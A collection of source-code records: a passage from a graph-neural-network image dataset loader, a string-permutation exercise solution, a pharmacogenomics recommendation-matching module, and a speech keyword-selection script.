(edge_norm_used_pos[edge_index_first]-edge_norm_used_pos[edge_index_second]).pow(2).sum(1).sqrt()\n else:\n edge_attr = None\n\n # always use 
sparse format to save memory and computation due to the sparsity of the input\n sparse_size = edge_index_first[-1]+1\n adj_t = SparseTensor(row=edge_index_first, col=edge_index_second, value=edge_attr, sparse_sizes=(sparse_size, sparse_size), is_sorted=True, trust_data=True)\n shape_lengths_size = actual_cumsum_shape_lengths[-1]\n\n # for graph of graphs we need to also compute the graphs for the contours\n if graph_params['graph_of_graphs']:\n shape_lengths_plus_one = shape_lengths+1\n shape_lengths_plus_one_size = shape_lengths_size+shape_lengths_shape\n used_shapes = shapes\n edge_norm_used_shapes = shapes\n # normalise node features (which are positions) according to the given options\n if graph_params['normalise_shapes'] or graph_params['polar_shapes'] or graph_params['superpixel_rotation_information']:\n used_shapes = used_shapes.view(shapes.shape[0]//2,2)\n shape_centroids_y = torch.repeat_interleave(centroid_y, shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)\n shape_centroids_x = torch.repeat_interleave(centroid_x, shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)\n used_shapes_y_diff = used_shapes[:,0]-shape_centroids_y\n used_shapes_x_diff = used_shapes[:,1]-shape_centroids_x\n shape_centroid_dist = torch.sqrt(used_shapes_y_diff**2+used_shapes_x_diff**2)\n shape_centroid_angle = torch.atan2(used_shapes_y_diff, used_shapes_x_diff)\n if graph_params['normalise_shapes'] or graph_params['superpixel_rotation_information']:\n cumsum_idx_biggest_distance = torch.index_select(all_data,0,get_consecutive_idxs(biggest_distance_shape_idx_offset, nr_superpixels)).to(torch.long)+cumsum_shape_lengths+arange_shape_lengths\n else:\n cumsum_idx_biggest_distance = None\n if graph_params['superpixel_rotation_information']:\n biggest_angle = shape_centroid_angle[cumsum_idx_biggest_distance]\n shape_centroid_angle-=torch.repeat_interleave(biggest_angle, shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)\n shape_centroid_angle[actual_cumsum_shape_lengths+arange_shape_lengths] = 0\n if graph_params['normalise_node_data']:\n used_angle = biggest_angle.unsqueeze(1)\n else:\n used_angle = (biggest_angle.unsqueeze(1)+torch.pi)/(torch.pi*2)\n x = torch.hstack((x,used_angle))\n used_statistics = torch.vstack((used_statistics, statistics.view(statistics.shape[0]//2,2)[7,:]))\n # for normalisation we need to also use the indices of the node with the highest distance from the center in a superpixel\n if graph_params['normalise_shapes']:\n biggest_distance = used_shapes[cumsum_idx_biggest_distance]\n shape_norm_distances = torch.sqrt((torch.repeat_interleave(biggest_distance[:,0], shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)-\n shape_centroids_y)**2+(torch.repeat_interleave(biggest_distance[:,1], shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)-shape_centroids_x)**2)\n shape_norm_distances[shape_norm_distances==0]=1\n shape_centroid_dist/=shape_norm_distances\n edge_norm_used_shapes = torch.stack((shape_centroid_dist*torch.sin(shape_centroid_angle), shape_centroid_dist*torch.cos(shape_centroid_angle))).t().flatten().contiguous()\n if graph_params['polar_shapes']:\n used_shapes = torch.stack((shape_centroid_dist, (shape_centroid_angle+torch.pi)/(torch.pi*2))).t().contiguous()\n else:\n used_shapes = edge_norm_used_shapes\n\n used_shapes=used_shapes.flatten()\n \n double_shape_lengths = shape_lengths*2\n # since the (0,0) centers of the shapes are interspersed in the contour data, we need to filter them out if the center option is not 
used\n if not graph_params['include_shape_centers']:\n edge_norm_idxs = get_consecutive_idxs(double_cumsum_shape_lengths+2*arange_shape_lengths, double_shape_lengths)\n sub_x = torch.index_select(used_shapes,0,edge_norm_idxs).view(shape_lengths_size,2)\n else:\n sub_x = used_shapes.view(edge_norm_used_shapes.shape[0]//2,2)\n\n # for the shape edges, we generate them dynamically so that we don't have to store them in the dataset\n # and thus the size of the dataset is greatly reduced\n # since they have to be sorted in a way specific to the sparse tensor representation (first by row then by column)\n # we need to do some pattern-based vectorised generation for efficiency\n # these are mostly constructing the beginning, middle, and end parts of each contour representation vectorised\n # then merging them together\n first_begin_sub_edges = cumsum_shape_lengths+1\n second_begin_sub_edges = cumsum_shape_lengths+shape_lengths-1\n first_end_sub_edges = cumsum_shape_lengths\n second_end_sub_edges = second_begin_sub_edges-1\n\n non_zero_middle = shape_lengths != 2\n shape_lengths_non_zero_middle_minus_two = shape_lengths[non_zero_middle]-2\n \n if graph_params['include_shape_centers']:\n second_begin_sub_edges+=arange_shape_lengths\n third_begin_sub_edges = second_begin_sub_edges+1\n cumsum_arange_shape_lengths = cumsum_shape_lengths+arange_shape_lengths\n cumsum_arange_shape_lengths_non_zero_middle = cumsum_arange_shape_lengths[non_zero_middle]\n first_middle_sub_edges = get_consecutive_idxs(cumsum_arange_shape_lengths_non_zero_middle,shape_lengths_non_zero_middle_minus_two)\n sub_edges_first_cnts = torch.full((shape_lengths_size+shape_lengths_shape,), 3)\n sub_edges_first_cnts[cumsum_arange_shape_lengths+shape_lengths] = shape_lengths\n sub_edges_first = torch.repeat_interleave(torch.arange(shape_lengths_size+shape_lengths_shape), sub_edges_first_cnts, output_size=shape_lengths_size*4)\n sub_edges_second = torch.zeros(shape_lengths_size*4, dtype=torch.long)\n\n center_edge_offset = cumsum_shape_lengths*4\n center_edge_offset_triple_shape_lengths = center_edge_offset+shape_lengths*3\n \n sub_edges_second[center_edge_offset] = first_begin_sub_edges+arange_shape_lengths\n sub_edges_second[center_edge_offset+1] = second_begin_sub_edges\n sub_edges_second[center_edge_offset+2] = third_begin_sub_edges\n sub_edges_second[get_consecutive_idxs(center_edge_offset[non_zero_middle]+3, shape_lengths_non_zero_middle_minus_two*3)] = torch.stack((first_middle_sub_edges, first_middle_sub_edges+2, \n torch.repeat_interleave(second_begin_sub_edges[non_zero_middle]+1, shape_lengths_non_zero_middle_minus_two))).t().flatten()\n sub_edges_second[center_edge_offset_triple_shape_lengths-3] = first_end_sub_edges+arange_shape_lengths\n sub_edges_second[center_edge_offset_triple_shape_lengths-2] = second_end_sub_edges+arange_shape_lengths\n sub_edges_second[center_edge_offset_triple_shape_lengths-1] = third_begin_sub_edges\n sub_edges_second[get_consecutive_idxs(center_edge_offset_triple_shape_lengths, shape_lengths)]=get_consecutive_idxs(cumsum_arange_shape_lengths, shape_lengths)\n else:\n cumsum_shape_lengths_non_zero_middle = cumsum_shape_lengths[non_zero_middle]\n sub_edges_first = torch.repeat_interleave(torch.arange(shape_lengths_size), torch.full((shape_lengths_size,), 2), output_size=2*shape_lengths_size)\n sub_edges_second = torch.zeros(shape_lengths_size*2, dtype=torch.long)\n double_cumsum_double_lengths = double_cumsum_shape_lengths+double_shape_lengths\n 
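# Worked illustration (added comment, not in the original): for a single contour\n            # of length 4 at offset 0 the ring edges, sorted by (row, col) as SparseTensor\n            # expects, are rows [0,0,1,1,2,2,3,3] and cols [1,3,0,2,1,3,0,2]; the\n            # pattern-based fills below build exactly this layout in a vectorised way.\n            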
sub_edges_second[double_cumsum_shape_lengths]=first_begin_sub_edges\n            sub_edges_second[double_cumsum_shape_lengths+1] = second_begin_sub_edges\n            sub_edges_second[double_cumsum_double_lengths-2] = first_end_sub_edges\n            sub_edges_second[double_cumsum_double_lengths-1] = second_end_sub_edges\n            sub_edges_second[get_consecutive_idxs(double_cumsum_shape_lengths[non_zero_middle]+2, shape_lengths_non_zero_middle_minus_two*2)] = torch.stack((\n                get_consecutive_idxs(cumsum_shape_lengths_non_zero_middle,shape_lengths_non_zero_middle_minus_two), \n                get_consecutive_idxs(cumsum_shape_lengths_non_zero_middle+2,shape_lengths_non_zero_middle_minus_two))).t().flatten()\n\n        # compute edge weights if needed\n        if graph_params['use_sub_edge_weights']:\n            if not graph_params['include_shape_centers']:\n                edge_norm_sub_x = torch.index_select(edge_norm_used_shapes,0,edge_norm_idxs).view(shape_lengths_size,2)\n            else:\n                edge_norm_sub_x = edge_norm_used_shapes.view(edge_norm_used_shapes.shape[0]//2,2)\n            sub_edges_attr = (edge_norm_sub_x[sub_edges_first]-edge_norm_sub_x[sub_edges_second]).pow(2).sum(1).sqrt()\n        else:\n            sub_edges_attr = None\n\n        sub_sparse_size = sub_edges_first[-1]+1\n        # construct the adjacency matrix batched sparse representation for the contour input\n        sub_adj_t = SparseTensor(row=sub_edges_first, col=sub_edges_second, value=sub_edges_attr, sparse_sizes=(sub_sparse_size, sub_sparse_size), is_sorted=True, trust_data=True)\n        if graph_params['include_shape_centers']:\n            sub_batch = torch.repeat_interleave(arange_shape_lengths, shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)\n        else:\n            sub_batch = torch.repeat_interleave(arange_shape_lengths, shape_lengths, output_size=shape_lengths_size)\n    else:\n        sub_x = None\n        sub_adj_t = None\n        sub_batch = None\n\n    # normalise superpixel features if required\n    if graph_params['normalise_node_data']:\n        x = (x-used_statistics[:,0])/used_statistics[:,1]\n\n    if graph_params['return_pool_block_data']:\n        edge_index = torch.vstack((edge_index_first, edge_index_second))\n        batch_lengths = nr_superpixels\n        edge_batch = torch.repeat_interleave(torch.arange(num_edges.shape[0]), double_num_edges)\n    else:\n        edge_index = None\n        batch_lengths = None\n        edge_batch = None\n\n    # anything that was not needed according to the parameters given for the input of the model is None, so that we save memory\n    return GraphData(x=x, adj_t=adj_t, pos=pos, y=y,\n                   sub_x=sub_x, sub_adj_t=sub_adj_t, batch=batch,\n                   sub_batch=sub_batch, edge_index=edge_index, batch_lengths=batch_lengths, edge_batch=edge_batch)\n    \nclass ImgGraphDataset(Dataset):\n    def __init__(self, base_root_dir, data_dir, dataset_type: SupportedDatasets, split: Splits, prep_params, graph_params, \n                 only_create_dataset, max_out_ram_for_preprocessing, statistics_file_type):\n        super().__init__()\n        self.root = get_dataset_dir(base_root_dir, dataset_type)\n        self.raw_dir = os.path.join(self.root, 'raw')\n        if data_dir == '':\n            self.data_dir = self.root\n        else:\n            self.data_dir = data_dir\n        self.split=split\n        self.dataset_type = dataset_type\n        self.dataset = None\n        self.processed_file_names_length = None\n        self.prep_params = prep_params\n        self.graph_params = graph_params\n        self.statistics_file_type = statistics_file_type if statistics_file_type is not None else self.split.name\n        self.processed_dir = os.path.join(self.root,\"processed\", self.get_processed_name())\n        self.preprocessed_file_path = os.path.join(self.processed_dir,self.split.name)\n        self.statistics_file_path = self.preprocessed_file_path.replace(self.split.name, 
self.statistics_file_type)\n self.max_out_ram_for_preprocessing = max_out_ram_for_preprocessing\n if dataset_type is SupportedDatasets.CIFAR10:\n self.classes = torch.arange(10)\n elif dataset_type is SupportedDatasets.IMAGENET:\n self.classes = torch.arange(1000)\n if not is_preprocessed_data_available(root=self.raw_dir, processed_dir=self.processed_dir, dataset_type=dataset_type, split=split):\n make_dataset_available_for_preprocessing(root=self.raw_dir, data_dir=self.data_dir, processed_dir=self.processed_dir, dataset_type=dataset_type, split=split)\n self.preprocess_data()\n if not only_create_dataset:\n self.load_preprocessed_data()\n\n def get_processed_name(self):\n name = f'data_{self.split.name}'\n if self.prep_params['use_slic']:\n name += '_slic'\n if self.prep_params['scale_params_to_img']:\n name += '_scaled'\n if self.prep_params['scale_only_min_size']:\n name += '_scaled_only_min_size'\n if self.prep_params['use_slic']:\n name += f'_{self.prep_params[\"compactness\"]}_{self.prep_params[\"region_size\"]}'\n else:\n name += f'_{self.prep_params[\"sigma\"]}_{self.prep_params[\"scale\"]}_{self.prep_params[\"min_size\"]}_{self.prep_params[\"approx_epsilon\"]}'\n return name\n\n def preprocess_data(self):\n mapping = 'identity_mapping' if self.dataset_type is SupportedDatasets.CIFAR10 else os.path.join(self.processed_dir,\"idx_to_name_mapping.txt\")\n if self.dataset_type is SupportedDatasets.IMAGENET and self.split.name == 'test':\n used_split_name = 'val'\n else:\n used_split_name = self.split.name\n used_raw_dir = os.path.join(self.raw_dir, used_split_name) if self.dataset_type is SupportedDatasets.CIFAR10 else os.path.join(self.data_dir, used_split_name)\n max_ram_for_data = -1\n # heuristic for determining how much RAM to require for the dataset in the preprocessing\n # the heuristic was done for 96 GB RAM available and the Felzenszwalb hyperparameters presented in the paper\n if self.max_out_ram_for_preprocessing:\n max_ram_for_data = psutil.virtual_memory()[1]//(1024*1024) - 30*1024;\n cpp_args = [\n os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))),'cpp_preprocessing', 'image_to_graph_dataset'),\n used_raw_dir, \n self.processed_dir,\n self.split.name,\n mapping,\n str(self.prep_params['sigma']), \n str(self.prep_params['scale']),\n str(self.prep_params['min_size']), \n str(self.prep_params['approx_epsilon']), \n str(int(self.prep_params['use_slic'])),\n str(int(self.prep_params['region_size'])),\n str(int(self.prep_params['compactness'])),\n str(int(self.prep_params['scale_params_to_img'])),\n str(int(self.prep_params['scale_only_min_size'])),\n str(int(max_ram_for_data))\n ]\n print(f'Running processing with: {cpp_args}')\n subprocess.run(cpp_args)\n\n def load_preprocessed_data(self):\n self.data = torch.tensor(np.load(self.preprocessed_file_path+'.npy'),dtype=torch.float32)\n self.offsets = torch.tensor(np.load(self.preprocessed_file_path+'_offsets.npy'),dtype=torch.long)\n self.statistics = torch.tensor(np.load(self.statistics_file_path+'_statistics.npy'),dtype=torch.float)\n self.lengths = self.offsets[1:]-self.offsets[:-1]\n\n\n def __getitem__(self, given_idxs):\n return get_data(given_idxs=given_idxs, offsets=self.offsets, lengths=self.lengths, statistics = self.statistics, data=self.data, graph_params=self.graph_params)\n \n def __len__(self):\n return 
self.lengths.shape[0]\n","repo_name":"lukasknobel/ShapeGNN","sub_path":"src/data_handling/ImgGraphDataset.py","file_name":"ImgGraphDataset.py","file_ext":"py","file_size_in_byte":22657,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"}
{"seq_id":"38430597686","text":"#User function Template for python3\n\n\nfrom itertools import permutations\n\nclass Solution:\n    def find_permutation(self, S):\n        res = set()\n        # sort the string in lexicographic order\n        S = ''.join(sorted(S))\n        for perm in permutations(S):\n            # keep adding while there is a next permutation\n            res.add(''.join(perm))\n        return sorted(list(res))\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\n\nif __name__ == '__main__':\n\tt=int(input())\n\tfor i in range(t):\n\t\tS=input()\n\t\tob = Solution()\n\t\tans = ob.find_permutation(S)\n\t\tfor i in ans:\n\t\t\tprint(i,end=\" \")\n\t\tprint()\n# } Driver Code Ends","repo_name":"shibam120302/LeetCode","sub_path":"Permutations of a given string - GFG/permutations-of-a-given-string.py","file_name":"permutations-of-a-given-string.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}
{"seq_id":"41157200386","text":"import os\nfrom pkgutil import get_data\nimport re\nfrom collections import defaultdict\nfrom typing import Optional\n\nfrom loguru import logger\nfrom numpy import source\n\nfrom openpgx.cpic import create_cpic_database\nfrom openpgx.dpwg import create_dpwg_database\nfrom openpgx.fda import create_fda_database\n\nfrom openpgx.helpers import words_to_sentence, get_database\n\nDATABASES = {\n    \"cpic\": create_cpic_database,\n    \"dpwg\": create_dpwg_database,\n    \"fda\": create_fda_database,\n}\n\n\ndef index_recommendations(all_recommendations: list) -> dict:\n    result = defaultdict(lambda: {\"cpic\": [], \"dpwg\": [], \"fda\": []})\n\n    for recommendation in all_recommendations:\n        result[recommendation[\"drug\"]][recommendation[\"source\"]].append(recommendation)\n    \n    return result\n\n\nresult = {}\n\n\ndef get_best_recommendation(recommendations: list) -> dict:\n    # TODO: probably more factors than the number of factors need to be considered\n    \"\"\"\n    example:\n    {'factors': {'VKORC1': 'rs9923231 reference (C)'},\n    'guideline': 'https://www.pharmgkb.org/guidelineAnnotation/PA166104938',\n    'recommendation': 'NO action is needed for this gene-drug interaction'},\n    {'factors': {},\n    'guideline': 'https://pharmgkb.org/guidelineAnnotation/PA166104979',\n    'recommendation': 'There are currently no recommendations for acenocoumarol '\n                        'dosing based on CYP2C9 genotypes.\\n'}]\n    \"\"\"\n    def score(recommendation):\n        return len(recommendation[\"factors\"].keys())\n\n    return max(recommendations, key=score)\n\n\n\ndef does_encoding_match_factor(encoding: str, factor: str) -> bool:\n    \"\"\"\n    Checks if encoding matches factor\n\n    encoding is the value of factor, e.g. \"== 5.25\", \"poor metabolizer\", \"positive\"\n    factor is:\n    - activity score: a range for which encoding matches factor, e.g. 
\">= 2.0\"\n or\n - phenotype\n or\n - genotype (in HLA cases)\n \n \"\"\"\n \n if type(encoding) == list:\n for e in encoding:\n if does_encoding_match_factor(e, factor):\n return True\n return False\n \n # activity score: \"== 2.00\" and \">= 2.00\"\n if '= ' in factor and type(encoding) != str:\n factor_operator, factor_value = factor[0:2], factor[2:]\n if factor_operator == \"==\":\n return encoding == float(factor_value)\n elif factor_operator == \">=\":\n return encoding >= float(factor_value)\n\n # In factors other than activity score (phenotype, genotype)\n return encoding == factor\n\n\n\ndef recommendation_matches_genotype(recommendation: dict, genotype: dict) -> bool:\n \"\"\"\n Checks if all factors for specific drug z\n Usage:\n\n - recommendation[\"factors\"]\n dictionary for specific drug, where keys are factor names and values are allowed factor range values:\n for example:\n {\n 'HLA-B*57:01': 'negative',\n # 'population': 'general'\n }\n - genotype\n dictionary where key is genename and value is genotype (haplotype or diplotype)\n for example: \n {'CYP2D6': '*1/*1'}\n\n \n \"\"\"\n if len(genotype) == 0:\n return len(recommendation[\"factors\"]) == 0\n\n for gene, factor in recommendation[\"factors\"].items():\n if gene not in genotype.keys():\n return False # filter out other factors than genes (example: population)\n\n if factor is None:\n return False\n\n if not does_encoding_match_factor(genotype[gene], factor):\n return False\n\n return True\n\n\ndef get_recommendation_for_drug(database: dict, drug: str, encodings: str):\n \"\"\"\n Gets best matched recommention for specific drug in specific database (cpic, dpwd, fda)\n database:\n for example:\n {\n 'recommendations': {\n 'abacavir': {\n 'factors': {'HLA-B*57:01': 'negative', 'population': 'general'},\n 'recommendation': 'Use abacavir per standard dosing guidelines',\n 'strength': 'strong',\n 'guideline': 'https://cpicpgx.org/guidelines/guideline-for-abacavir-and-hla-b/'\n },\n 'allopurinol': [...]\n },\n \"encodings\" : {\"CYP2D6\": [\"poor metabolizer\", 0.0, ...}\n \n Note: There can be more recommendations for single drug in single database (for example VKORC1 and CYP2C9 in dpwg)\n \"\"\"\n if drug not in database[\"recommendations\"]:\n return None\n\n drug_recommendations = database[\"recommendations\"][drug]\n\n matched_recommendations = []\n\n for recommendation in drug_recommendations:\n if recommendation_matches_genotype(recommendation, encodings):\n matched_recommendations.append(recommendation)\n\n if len(matched_recommendations) > 0:\n recommendation = get_best_recommendation(matched_recommendations)\n\n return recommendation\n\n return None\n\n\ndef verify_vendor_database(data):\n recommendation_gene_names = data.keys()\n recommendation_factor_names = [d[\"factors\"] for d in data.values()]\n\n\ndef create_database(sources: dict = {}):\n result = {}\n\n for name in [\"cpic\", \"dpwg\", \"fda\"]:\n result[name] = DATABASES[name](sources.get(name))\n\n return result\n\n\ndef get_drugs(database) -> list:\n drugs = []\n for source_database in database.values():\n drugs.extend(source_database[\"recommendations\"].keys())\n return drugs\n\ndef phenotyping(genotypes: dict, database: dict ) -> dict:\n \"\"\"\n Performs translation, changing genotype to encoding according to encodings taken from databases.\n genotype: according to main input example.json\n database: dictionary with databases names as keys (cpic, fda, dpwg) and \"recommendations\" and \"encodings\"\n \"\"\"\n cpic_encodings = 
database[\"cpic\"][\"encodings\"]\n dpwg_encodings = database[\"dpwg\"][\"encodings\"]\n fda_encodings = database[\"fda\"][\"encodings\"] #TODO implement encodings from DPWG and FDA also\n phenotyping_result = {}\n for gene, genotype in genotypes.items():\n sorted_genotype = \"/\".join(sorted(genotype.split(\"/\")))\n phenotyping_result[gene] = []\n for encodings in [cpic_encodings, dpwg_encodings]:\n if gene in encodings and sorted_genotype in encodings[gene]:\n phenotyping_result[gene] = encodings[gene][sorted_genotype]\n return phenotyping_result\n \n \ndef get_recommendations_for_patient(genotypes: dict) -> dict:\n \"\"\"\n 1. Creates database with all databases data (cpic, fda, dpwg). Including recommendations + encodings for each\n 2. Performs phenotyping (using encodings). Example:\n \"encodings\": {\"NUDT15\": {\n \"*1/*1\": [\n \"normal metabolizer\"\n ],\n \"*1/*3\": [\n \"intermediate metabolizer\"\n ]}\n 2. Creates recommendation dictionary for each drug in database\n if genotype translated to encoding matches factors in recomendation\n\n genotype: dictionary with all genes that were genotyped for specific patient, according to example.json\n \"\"\"\n recommendations = defaultdict(dict)\n\n database = get_database()\n\n drugs = get_drugs(database)\n \n genotypes_translated_to_encodings = phenotyping(genotypes, database)\n\n \n for drug in drugs:\n recommendations[drug] == defaultdict(list)\n for source, source_database in database.items():\n recommendations[drug][source] = []\n recommendation = get_recommendation_for_drug(\n source_database, drug, genotypes_translated_to_encodings\n )\n\n if recommendation != None:\n recommendations[drug][source].append(recommendation)\n\n return dict(recommendations)\n","repo_name":"monigenomi/openpgx","sub_path":"openpgx/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"23686134651","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport argparse\nimport random\nimport numpy as np\nfrom auto_utils import (\n load_lexicon,\n load_keywords,\n get_kw_and_word_count,\n get_word_count,\n arrange_into_freq_bins,\n get_wlen,\n get_wset,\n get_wfreq,\n write_kw_to_file,\n CAP,\n CUP,\n)\n\n\n# def do_selection(word2count, lex, word_set, max_lim, ratios):\n\n# # t_counts = []\n# # t_wlens = []\n\n# bin_dict = {} # nested dict {wfreq_1: {wlen_3: [...], wlen_4: [...], ...}, wfreq_2: {...}, ...}\n\n# for w in word_set:\n\n# freq_w = word2count[w]\n# len_w = len(lex[w])\n\n# sub_dict = {}\n# if freq_w in bin_dict:\n# sub_dict = bin_dict[freq_w]\n\n# try:\n# sub_dict[len_w].append(w)\n# except KeyError:\n# sub_dict[len_w] = [w]\n\n# bin_dict[freq_w] = sub_dict\n\n# print('------------------------------------')\n# print('bin_dict:', len(bin_dict))\n\n# selection = []\n\n# wlen_seq = np.arange(15, 4, -1).astype(int)\n\n# for i, wf in enumerate(range(1, 11, 1)):\n# try:\n# sub_selection = []\n# sub_dict = bin_dict[wf]\n# max_words_for_wf = int(max_lim * ratios[i])\n# print('max words for wf:', max_words_for_wf, end=\" \")\n# avg_per_wlen = max(2, (max_words_for_wf // len(sub_dict)))\n# print('avg no. 
of words per wlen:', avg_per_wlen)\n# for wlen, word_list in sub_dict.items():\n# if 3 <= wlen <= 15:\n# random.shuffle(word_list)\n# print('wf', wf, 'wlen', wlen, len(word_list))\n# if len(word_list) > avg_per_wlen:\n# sub_selection.extend(word_list[:avg_per_wlen])\n# else:\n# sub_selection.extend(word_list)\n\n# # sub_selection = sub_dict[wlen_seq[i]]\n# # random.shuffle(sub_selection)\n# selection.extend(sub_selection)\n# print(wf, ratios[i], 'cum sum:', len(selection))\n\n# except KeyError:\n# continue\n# # print(\"wf:\", wf, \"not in bin dict\")\n# # sys.exit()\n\n\n# return selection\n\n\ndef do_selection(word2count, lex, word_set, max_lim, ratios, wfreq=0):\n\n # t_counts = []\n # t_wlens = []\n\n bin_dict = (\n {}\n ) # nested dict {wfreq_1: {wlen_3: [...], wlen_4: [...], ...}, wfreq_2: {...}, ...}\n\n for w in word_set:\n\n freq_w = word2count[w]\n len_w = len(lex[w])\n\n sub_dict = {}\n if freq_w in bin_dict:\n sub_dict = bin_dict[freq_w]\n\n try:\n sub_dict[len_w].append(w)\n except KeyError:\n sub_dict[len_w] = [w]\n\n bin_dict[freq_w] = sub_dict\n\n print(\"------------------------------------\")\n print(\"bin_dict:\", len(bin_dict))\n\n selection = []\n\n # wlen_seq = np.arange(15, 3, -1).astype(int)\n\n wlen_range = [3, 16]\n\n for i, wf in enumerate(range(1, 25, 1)):\n if wfreq != 0 and wf != wfreq:\n continue\n try:\n sub_selection = []\n sub_dict = bin_dict[wf]\n max_words_for_wf = int(max_lim * ratios[i])\n print(\"max words for wf:\", wf, max_words_for_wf, end=\" \")\n avg_per_wlen = max(\n max_words_for_wf // len(sub_dict),\n (max_words_for_wf // (wlen_range[1] - wlen_range[0])),\n )\n print(\"avg no. of words per wlen:\", avg_per_wlen)\n for wlen, word_list in sub_dict.items():\n if wlen_range[0] <= wlen <= wlen_range[1]:\n random.shuffle(word_list)\n print(\"wf\", wf, \"wlen\", wlen, len(word_list))\n if len(word_list) > avg_per_wlen:\n sub_selection.extend(word_list[:avg_per_wlen])\n else:\n sub_selection.extend(word_list)\n\n # sub_selection = sub_dict[wlen_seq[i]]\n # random.shuffle(sub_selection)\n selection.extend(sub_selection)\n print(wf, ratios[i], \"cum sum:\", len(selection))\n\n except KeyError:\n continue\n # print(\"wf:\", wf, \"not in bin dict\")\n # sys.exit()\n\n return selection\n\n\ndef main():\n \"\"\" main method \"\"\"\n\n # keywords = set()\n # with open(args.keywords_file, \"r\", encoding=\"utf-8\") as fpr:\n # for line in fpr:\n # if len(line.strip().split()) == 2:\n # keywords.add(line.strip().split()[-1])\n # else:\n # keywords.add(line.strip())\n\n # print(\"Loaded\", len(keywords), \"keywords from\", args.keywords_file)\n\n data_dir = args.data_dir\n\n lex = load_lexicon(os.path.join(data_dir, \"local/dict/lexicon.txt\"))\n print(\"* Lexicon:\", len(lex))\n\n train_w_count = get_word_count(os.path.join(data_dir, \"train/text\"))\n dev_w_count = get_word_count(os.path.join(data_dir, \"dev/text\"))\n test_w_count = get_word_count(os.path.join(data_dir, \"test/text\"))\n\n train_wset = get_wset(train_w_count)\n dev_wset = get_wset(dev_w_count)\n test_wset = get_wset(test_w_count)\n\n train_count = get_wfreq(train_w_count)\n dev_count = get_wfreq(dev_w_count)\n test_count = get_wfreq(test_w_count)\n\n print(\"== word occurrence ==\")\n arrange_into_freq_bins(train_count, args.max_bin)\n arrange_into_freq_bins(dev_count, args.max_bin)\n arrange_into_freq_bins(test_count, args.max_bin)\n\n print(\"== word length ==\")\n train_w_lens = get_wlen(train_w_count, lex)\n arrange_into_freq_bins(train_w_lens, args.max_bin)\n\n dev_w_lens = 
get_wlen(dev_w_count, lex)\n arrange_into_freq_bins(dev_w_lens, args.max_bin)\n\n test_w_lens = get_wlen(test_w_count, lex)\n arrange_into_freq_bins(test_w_lens, args.max_bin)\n\n tdt_set = (test_wset & train_wset) & dev_wset\n print(f\"C = (train {CAP} dev {CAP} test):\", len(tdt_set))\n\n tt_set = (train_wset & test_wset) - tdt_set\n print(f\"T = (train {CAP} test) - C :\", len(tt_set))\n\n dt_set = (dev_wset & test_wset) - tdt_set\n print(f\"D = (dev {CAP} test) - C :\", len(dt_set))\n\n t_set = test_wset - (tdt_set | tt_set | dt_set)\n print(f\"test - (C {CUP} T {CUP} D) :\", len(t_set))\n\n # tdt_counts = [test_w_count[w] for w in tdt_set]\n # arrange_into_freq_bins(tdt_counts, args.max_bin)\n\n # if args.wfreq == 0:\n\n # max_lim = int(args.num_kw * args.test_ratio)\n # ratios = [.13, .12, .12, .12, .12, .12, .09, .07, .06, .05]\n # sel_tdt = do_selection(test_w_count, lex, tdt_set, max_lim, ratios)\n\n # max_lim = int(args.num_kw * args.test_ratio)\n # sel_tt = do_selection(test_w_count, lex, tt_set, max_lim, ratios)\n\n # max_lim = int(args.num_kw * args.test_ratio)\n # sel_dt = do_selection(test_w_count, lex, dt_set, max_lim, ratios)\n\n # max_lim = int(args.num_kw * args.test_ratio)\n # sel_t = do_selection(test_w_count, lex, t_set, max_lim, ratios)\n\n # print(len(sel_tdt), len(sel_tt), len(sel_dt), len(sel_t))\n # all_kw = sel_tdt + sel_tt + sel_dt + sel_t\n\n # write_kw_to_file(sel_tdt, args.out_file + \"_tdt\")\n # write_kw_to_file(sel_tt, args.out_file + \"_tt\")\n # write_kw_to_file(sel_dt, args.out_file + \"_dt\")\n # write_kw_to_file(sel_t, args.out_file + \"_t\")\n\n # else:\n # # Select keywords corresponding to this wfreq only\n\n # args.test_ratio = 1\n\n max_lim = int(args.num_kw * args.test_ratio)\n ii = np.sort(np.random.randint(1, 1000, size=(args.max_wfreq)))[::-1]\n ratios = ii / ii.sum()\n print(\"ratios:\", ratios.tolist())\n\n sel_tdt = do_selection(test_w_count, lex, tdt_set, max_lim, ratios, args.wfreq)\n\n max_lim = int(args.num_kw * args.test_ratio)\n sel_tt = do_selection(test_w_count, lex, tt_set, max_lim, ratios, args.wfreq)\n\n max_lim = int(args.num_kw * args.test_ratio)\n sel_dt = do_selection(test_w_count, lex, dt_set, max_lim, ratios, args.wfreq)\n\n max_lim = int(args.num_kw * args.test_ratio)\n sel_t = do_selection(test_w_count, lex, t_set, max_lim, ratios, args.wfreq)\n\n print(len(sel_tdt), len(sel_tt), len(sel_dt), len(sel_t))\n all_kw = sel_tdt + sel_tt + sel_dt + sel_t\n\n write_kw_to_file(sel_tdt, args.out_file + \"_tdt\")\n write_kw_to_file(sel_tt, args.out_file + \"_tt\")\n write_kw_to_file(sel_dt, args.out_file + \"_dt\")\n write_kw_to_file(sel_t, args.out_file + \"_t\")\n\n write_kw_to_file(all_kw, args.out_file)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n # parser.add_argument(\"keywords_file\", help=\"path to keywords file\")\n parser.add_argument(\"data_dir\", help=\"path to data dir\")\n parser.add_argument(\"out_file\", help=\"path to save keywords\")\n parser.add_argument(\"-max_wfreq\", type=int, default=25)\n parser.add_argument(\"-max_bin\", type=int, default=25)\n parser.add_argument(\n \"-num_kw\", type=int, default=5000, help=\"desired number of keywords\"\n )\n parser.add_argument(\n \"-test_ratio\",\n type=float,\n default=0.5,\n help=\"ratio of total keywords to test-only keywords\",\n )\n parser.add_argument(\"-wfreq\", default=0, type=int)\n args = 